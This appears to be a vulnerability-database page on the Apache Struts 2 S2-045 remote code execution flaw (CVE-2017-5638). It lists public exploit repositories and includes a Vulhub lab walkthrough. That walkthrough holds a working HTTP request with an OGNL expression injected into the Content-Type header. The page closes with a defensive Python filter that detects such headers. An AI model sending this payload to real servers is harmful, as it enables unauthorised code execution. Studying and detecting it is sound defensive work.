CRITICAL
The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.
Weakness: Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.
Published: 2017-03-11
Community Advisory
This section is open source and is for any additional information that enhances or clarifies the official advisory above.
CVE-2017-5638 Exploits (70)
- mazen160/struts-pwn ( 387)
- Flyteas/Struts2-045-Exp ( 61)
- mthbernardes/strutszeiro ( 38)
- immunio/apache-struts2-CVE-2017-5638 ( 36)
- PolarisLab/S2-045 ( 23)
- jas502n/st2-046-poc ( 21)
- jas502n/S2-045-EXP-POC-TOOLS ( 21)
- ret2jazzy/Struts-Apache-ExploitPack ( 15)
- sUbc0ol/Apache-Struts2-RCE-Exploit-v2-CVE-2017-5638 ( 14)
- xsscx/cve-2017-5638 ( 14)
- jrrdev/cve-2017-5638 ( 13)
- tahmed11/strutsy ( 11)
- initconf/CVE-2017-5638_struts ( 8)
- Iletee/struts2-rce ( 8)
- payatu/CVE-2017-5638 ( 7)
- R4v3nBl4ck/Apache-Struts-2-CVE-2017-5638-Exploit- ( 4)
- opt9/Strutshock ( 3)
- falcon-lnhg/StrutsShell ( 3)
- 0x00-0x00/CVE-2017-5638 ( 3)
- opt9/Strutscli ( 2)
- oktavianto/CVE-2017-5638-Apache-Struts2 ( 2)
- lolwaleet/ExpStruts ( 2)
- win3zz/CVE-2017-5638 ( 2)
- aljazceru/CVE-2017-5638-Apache-Struts2 ( 2)
- Greynad/struts2-jakarta-inject ( 2)
- m3ssap0/struts2_cve-2017-5638 ( 1)
- ludy-dev/XworkStruts-RCE ( 1)
- riyazwalikar/struts-rce-cve-2017-5638 ( 1)
- un4ckn0wl3z/CVE-2017-5638 ( 1)
- Masahiro-Yamada/OgnlContentTypeRejectorValve ( 1)
- sUbc0ol/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner ( 1)
- grant100/cybersecurity-struts2 ( 1)
- andypitcher/check_struts ( 1)
- ggolawski/struts-rce ( 1)
- KarzsGHR/S2-046_S2-045_POC ( 1)
- projectdiscovery/nuclei-templates/cves/CVE-2017-5638.yaml
- 41570
- 41614
- HokieGeek/struts2-rce
- leandrocamposcardoso/CVE-2017-5638-Mass-Exploit
- mcassano/cve-2017-5638
- lizhi16/CVE-2017-5638
- rapid7/metasploit-framework/modules/exploits/multi/http/struts2_content_type_ognl.rb
- jrrombaldo/CVE-2017-5638
- jpacora/Struts2Shell
- invisiblethreat/strutser
- injcristianrojas/cve-2017-5638
- TamiiLambrado/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner
- homjxi0e/CVE-2017-5638
- sjitech/test_struts2_vulnerability_CVE-2017-5638
- gsfish/S2-Reaper
- eeehit/CVE-2017-5638
- colorblindpentester/CVE-2017-5638
- cafnet/apache-struts-v2-CVE-2017-5638
- c002/Apache-Struts
- Aasron/Struts2-045-Exp
- AndreasKl/CVE-2017-5638
- SpiderMate/Stutsfi
- bongbongco/cve-2017-5638
- donaldashdown/Common-Vulnerability-and-Exploit
- pasannirmana/Aspire
- bhagdave/CVE-2017-5638
- sabley1/struts2-rce
- jaeles-project/jaeles-signatures/cves/apache-struts-rce-cve-2017-5638.yaml
- sabley/struts2-rce
- random-robbie/CVE-2017-5638
- jongmartinez/CVE-2017-5638
- philaruff/struts2-rce
- Xhendos/CVE-2017-5638
- bryanwhyte/struts2-rce
CVE-2017-5638 Vulnerable Docker Environment
Vulhub is an open-source collection of Docker-ized vulnerable environments. No pre-existing knowledge of Docker is required, just execute two simple commands and you have a vulnerable environment.
S2-045 Remote Code Execution Vulnerability (CVE-2017-5638)
Affected Version: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10
References:
- http://struts.apache.org/docs/s2-045.html
- https://nsfocusglobal.com/apache-struts2-remote-code-execution-vulnerability-s2-045/
Setup
Execute the following command to start Struts2 2.3.30:
docker-compose up -d
After the container is running, visit http://your-ip:8080 and you will see an example upload page.
Exploitation
Verify the vulnerability with the following request:
POST / HTTP/1.1
Host: localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,es;q=0.6
Connection: close
Content-Length: 0
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',233*233)}.multipart/form-data
The vulhub response header carries the result of 233*233, which shows that the expression in the Content-Type header has been successfully executed.
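As a defender-side counterpart to the verification request above, here is an added example (not Vulhub's or Struts' own code) of the kind of check a servlet filter, reverse proxy or log-review script can apply in front of the Jakarta multipart parser: it allowlists the Content-Type of upload requests strictly to multipart/form-data plus a boundary, and separately flags OGNL expression markers (%{ or ${) in the three headers the CVE description names. The request samples, the header names and the function names are all constructed for this example.

```python
import re
from typing import Dict, List

# Start of an OGNL expression in either syntax: %{ ... } or ${ ... }.
# A legitimate upload request never carries these in its headers.
OGNL_MARKER = re.compile(r"[%$]\{")

# Strict allowlist for an upload Content-Type: the multipart media type,
# optionally followed by a boundary parameter built from RFC 2046 bchars.
MULTIPART_ALLOWED = re.compile(
    r"^multipart/form-data(?:\s*;\s*boundary=\"?[A-Za-z0-9'()+_,\-./:=? ]{1,70}\"?)?$",
    re.IGNORECASE,
)

# The headers named in the CVE description as reaching the error path.
HEADERS_OF_INTEREST = ("content-type", "content-disposition", "content-length")


def parse_headers(raw_request: str) -> Dict[str, str]:
    """Split a raw HTTP request into a lowercase-keyed header dict (body ignored)."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def ognl_markers_in(headers: Dict[str, str]) -> List[str]:
    """Names of the upload-related headers that carry an OGNL marker (for alerting)."""
    return [h for h in HEADERS_OF_INTEREST
            if h in headers and OGNL_MARKER.search(headers[h])]


def content_type_allowed(headers: Dict[str, str]) -> bool:
    """True when the request either never reaches the multipart parser or
    matches the strict multipart allowlist; anything else is rejected."""
    ctype = headers.get("content-type")
    if ctype is None or "multipart" not in ctype.lower():
        return True  # not a multipart request, the Jakarta parser is not involved
    return MULTIPART_ALLOWED.match(ctype) is not None


def classify_request(raw_request: str) -> Dict[str, object]:
    """Verdict for one request: reject if the allowlist fails or a marker is present."""
    headers = parse_headers(raw_request)
    flagged = ognl_markers_in(headers)
    ct_ok = content_type_allowed(headers)
    return {"reject": bool(flagged) or not ct_ok,
            "ognl_headers": flagged,
            "content_type_ok": ct_ok}


# Constructed sample: a legitimate browser file upload.
BENIGN_UPLOAD = (
    "POST /upload.action HTTP/1.1\r\n"
    "Host: localhost:8080\r\n"
    "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryabc123\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

# Constructed sample shaped like the verification request above: an OGNL
# expression prepended to the multipart media type.
OGNL_IN_CONTENT_TYPE = (
    "POST / HTTP/1.1\r\n"
    "Host: localhost:8080\r\n"
    "Content-Length: 0\r\n"
    "Content-Type: %{(233*233)}.multipart/form-data\r\n"
    "\r\n"
)

# Constructed sample: a plain form post, which never engages the multipart parser.
PLAIN_FORM = (
    "POST /login.action HTTP/1.1\r\n"
    "Host: localhost:8080\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, req in (("benign upload", BENIGN_UPLOAD),
                       ("ognl in content-type", OGNL_IN_CONTENT_TYPE),
                       ("plain form", PLAIN_FORM)):
        print(label, classify_request(req))
```

The allowlist is the check that actually blocks the request class: because Struts treats any Content-Type that contains multipart/form-data as multipart, only an exact media type plus boundary should be allowed through to the upload parser. The marker scan is deliberately kept separate so that it can feed alerting and log review even where a proxy already drops the request.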
Official CVE References
- talosintelligence.com/2017/03/apache-0-day-exploited.html
- trendmicro.com/trendlabs-security-intelligence/cve-2017-5638-apache-struts-vulnerability-remote-code-execution/
- arubanetworks.com/assets/alert/ARUBA-PSA-2017-002.txt
- eweek.com/security/apache-struts-vulnerability-under-attack.html
- oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
- securityfocus.com/bid/96729
- securitytracker.com/id/1037973
- arstechnica.com/security/2017/03/critical-vulnerability-under-massive-attack-imperils-high-impact-sites/
- apache.org/confluence/display/WW/S2-045
- apache.org/confluence/display/WW/S2-046
- 41570
- apache.org/repos/asf
- apache.org/repos/asf
- mazen160/struts-pwn
- rapid7/metasploit-framework/issues/8064
- www2.hpe.com/hpsc/doc/public/display
- www2.hpe.com/hpsc/doc/public/display
- www2.hpe.com/hpsc/doc/public/display
- sans.edu/diary/22169
- apache.org/thread.html/[email protected]%3Cannounce.apache.org%3E
- apache.org/thread.html/[email protected]%3Cannounce.apache.org%3E
- apache.org/thread.html/[email protected]%3Cannounce.apache.org%3E
- nmap.org/nsedoc/scripts/http-vuln-cve2017-5638.html
- packetstormsecurity.com/files/141494/S2-45-poc.py.txt
- netapp.com/advisory/ntap-20170310-0001/
- apache.org/docs/s2-045.html
- apache.org/docs/s2-046.html
- lenovo.com/us/en/product_security/len-14200
- tweet by theog150
- 41614
- imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/
- kb.cert.org/vuls/id/834067
- symantec.com/security-center/network-protection-security-advisories/SA145